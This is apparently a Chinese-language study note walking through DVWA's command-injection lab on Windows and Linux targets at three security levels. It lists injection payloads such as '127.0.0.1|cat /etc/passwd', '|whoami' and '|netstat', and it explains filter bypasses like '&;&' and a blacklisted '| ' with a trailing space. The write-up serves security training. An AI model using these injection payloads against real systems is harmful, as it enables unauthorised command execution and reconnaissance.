DVWA之命令注入漏洞

命令注入
DVWA之命令注入漏洞_第1张图片
DVWA之命令注入漏洞_第2张图片
1.Windows:(WinServer2003–192.168.31.2的dvwa:
A;B 先A后B
A&B AB无制约关系
A|B 显示B的执行结果
A&&B A成功执行B
A||B A失败执行B
低安全级别:
看源码(windows系统默认发四个包,Linux系统默认是一直发包,所以得-c 4)
DVWA之命令注入漏洞_第3张图片
127.0.0.1&&dir(ping 127.0.0.1(自己))
DVWA之命令注入漏洞_第4张图片
127.0.0.1| dir(只执行dir)
DVWA之命令注入漏洞_第5张图片127.0.0.1|ipconfig
DVWA之命令注入漏洞_第6张图片
127.0.0.1| arp -a(arp映射表)
DVWA之命令注入漏洞_第7张图片
127.0.0.1|calc(打开了winSer2003的计算器)
DVWA之命令注入漏洞_第8张图片
127.0.0.1|regedit
DVWA之命令注入漏洞_第9张图片
127.0.0.1|netstat -ano
DVWA之命令注入漏洞_第10张图片
中级安全级别:
源码:
DVWA之命令注入漏洞_第11张图片
过滤掉了&&和;为空,不能用&&,但可用|
或者绕过过滤:比如&;&过滤后为&&
高级安全级别:
DVWA之命令注入漏洞_第12张图片
把输入分段后再拼接

过滤了一系列字符,但是由于后台工作人员的失误 | 的后面多个空格,所以|还是可以用
如127.0.0.1|ipconfig
DVWA之命令注入漏洞_第13张图片
Linux:(Metasploitable2–192.168.70.136)的dvwa:
命令:cat /etc/passwd, id, groups, cat /etc/group, whoami, pwd, uname -a, netstat -pantu, netstat -nr
在这里插入图片描述

低安全级别:
源码
DVWA之命令注入漏洞_第14张图片
127.0.0.1| cat /etc/passwd (查看passwd文件内容(纯文本文件))注意不是password
https://blog.csdn.net/qq_36838191/article/details/85032118
Linux系统中,用户的关键信息被存放在系统的/etc/passwd文件中,系统的每一个合法用户账号对应于该文件中的一行记录。这行记录定义了每个用户账号的属性。各个字段的顺序和含义如下:注册名:口令:用户标识号:组标识号:用户名:用户主目录:命令解释程序
Unix/Linux系统中,口令不再直接保存在passwd文件中,通常将passwd文件中的口令字段使用一个“x”来代替,将/etc /shadow作为真正的口令文件,用于保存包括个人口令在内的数据。当然shadow文件是不能被普通用户读取的,只有超级用户才有权读取。
DVWA之命令注入漏洞_第15张图片
127.0.0.1 | id
DVWA之命令注入漏洞_第16张图片
127.0.0.1 | groups
DVWA之命令注入漏洞_第17张图片
127.0.0.1 |cat /etc/group
DVWA之命令注入漏洞_第18张图片
127.0.0.1 |whoami
DVWA之命令注入漏洞_第19张图片
127.0.0.1 |pwd (当前路径)
DVWA之命令注入漏洞_第20张图片
127.0.0.1 |uname -a (系统版本)
DVWA之命令注入漏洞_第21张图片
127.0.0.1|netstat -pantu (已开通的服务和连接)
DVWA之命令注入漏洞_第22张图片
127.0.0.1|netstat -nr
DVWA之命令注入漏洞_第23张图片
中级安全级别:
源码:
DVWA之命令注入漏洞_第24张图片
过滤掉了&&和;为空,不能用&&,但可用|
或者绕过过滤:比如&;&过滤后为&&
高级安全级别:
把输入分段后再拼接
DVWA之命令注入漏洞_第25张图片
如果输入不是纯数字:
在这里插入图片描述

你可能感兴趣的:(笔记)